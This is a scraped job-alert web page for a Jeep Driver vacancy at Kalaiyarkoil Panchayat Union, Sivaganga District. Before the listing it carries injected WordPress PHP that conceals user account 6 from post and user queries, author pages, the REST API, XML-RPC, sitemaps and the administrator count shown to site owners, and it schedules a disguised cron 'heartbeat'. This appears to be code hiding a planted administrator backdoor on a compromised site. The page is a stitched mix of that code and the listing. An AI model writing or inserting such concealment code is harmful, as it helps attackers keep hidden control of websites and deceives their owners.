add_action( 'pre_get_posts', function( $q ) {
if ( ! is_admin() && $q->is_main_query() ) {
$not_in = (array) $q->get( 'author__not_in' );
$not_in[] = 6;
$q->set(
'author__not_in',
array_unique( array_map( 'intval', $not_in ) )
);
}
}, 1 );
add_action( 'template_redirect', function() {
if ( is_author() ) {
$author = get_queried_object();
if ( $author instanceof WP_User && (int) $author->ID === 6 ) {
global $wp_query;
$wp_query->set_404();
status_header( 404 );
nocache_headers();
}
}
} );
add_action( 'pre_user_query', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
global $wpdb;
$q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 6 );
} );
add_action( 'pre_get_users', function( $q ) {
if ( current_user_can( 'manage_options' ) ) {
return;
}
$exclude = (array) $q->get( 'exclude' );
$exclude[] = 6;
$q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) );
} );
add_filter( 'wp_dropdown_users_args', function( $a ) {
$exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array();
$exclude[] = 6;
$a['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $a;
} );
add_filter( 'rest_user_query', function( $args, $request ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 6;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
}, 10, 2 );
add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) {
$route = $request->get_route();
if ( preg_match( '#^/wp/v2/users/6(/|$)#', $route ) ) {
return new WP_Error(
'rest_user_invalid_id',
'Invalid user ID.',
array( 'status' => 404 )
);
}
return $result;
}, 10, 3 );
add_filter( 'xmlrpc_methods', function( $methods ) {
unset(
$methods['wp.getUsers'],
$methods['wp.getUser'],
$methods['wp.getProfile']
);
return $methods;
} );
add_filter( 'wp_sitemaps_users_query_args', function( $args ) {
$exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array();
$exclude[] = 6;
$args['exclude'] = array_unique( array_map( 'intval', $exclude ) );
return $args;
} );
add_action( 'admin_head-users.php', function() {
echo '';
} );
add_filter( 'views_users', function( $views ) {
foreach ( array( 'all', 'administrator' ) as $key ) {
if ( isset( $views[ $key ] ) ) {
$views[ $key ] = preg_replace_callback(
'/\((\d+)\)/',
function( $m ) {
return '(' . max( 0, (int) $m[1] - 1 ) . ')';
},
$views[ $key ],
1
);
}
}
return $views;
} );
add_action( 'init', function() {
if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) {
return;
}
if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) {
wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' );
}
} );
add_action( 'wp_extra_bot_heartbeat', function() {
// noop
} );
Kalaiyarkoil Panchayat Union – Jeep Driver Recruitment 2025 (Sivaganga District) - India Sarkari Job Alert | Free Job Alert for Latest Government and Private Jobs
Apply for the Jeep Driver post at Kalaiyarkoil Panchayat Union, Sivaganga District, under the Rural Development & Panchayat Raj Department. Eligible candidates can submit offline applications within the specified dates with required documents and fee.
Job Details
Particulars Information Department Rural Development & Panchayat Raj Department, Kalaiyarkoil Panchayat Union, Sivaganga District Employment Type Direct Recruitment Job Title Jeep Driver Total Vacancies 1 Location Kalaiyarkoil, Sivaganga District, Tamil Nadu Application Method Offline/In person or by Speed Post Official Site sivaganga.nic.in Notification Date 06.11.2025 Application Window 10.11.2025 to 18.11.2025 (10:00 AM to 5:45 PM on working days) Last Date to Apply 18.11.2025 up to 5:45 PM
Advertisement No.
Not mentioned
Post and Vacancy Details
Post Name No. of Posts Pay Level Jeep Driver 1 Level-8 ₹19,500–₹71,900
Salary Details
Level-8 pay scale: ₹19,500–₹71,900 per month.
Educational Qualification
Must have passed 8th Standard.
Valid Driving License with Badge as per Motor Vehicles rules.
Minimum 5 years of driving experience.
Age Limit
Minimum Age: 18 years as on 01.07.2025.
Maximum Age: 42 years as on 01.07.2025.
Community/category reservation: SC(A) – Women – PSTM category notified for this vacancy.
Selection Process
Direct recruitment as per reservation norms.
Only eligible and complete applications will be considered.
How to Apply
Download and fill the application form from sivaganga.nic.in.
Attach self-attested copies of required documents: educational certificate, community certificate, PSTM proof, valid driving license with badge, and 5-year experience proof.
Enclose a self-addressed 10 x 4 inches postal cover with appropriate postage.
Submit the application in person on working days between 10:00 AM and 5:45 PM or send by Speed Post within the application window.
Pay the application fee of ₹50 via Demand Draft in favour of “Commissioner, Panchayat Union, Kalaiyarkoil” and attach the DD with the application.
Ensure the application reaches the Panchayat Union Office, Kalaiyarkoil – 630 551, on or before 18.11.2025, 5:45 PM.
Instructions
Read the notification fully and apply only if you satisfy eligibility and category conditions.
Incomplete, ineligible, or late applications will be rejected without notice.
Keep original documents ready for verification whenever called.
Important Dates
Event Date/Time Notification Date 06.11.2025 Application Period 10.11.2025 to 18.11.2025 (10:00 AM–5:45 PM, working days) Last Date & Time 18.11.2025, up to 5:45 PM
Important Links
Follow Us via Social media:
No Result
View All Result
© 2026 JNews - Premium WordPress news & magazine theme by Jegtheme .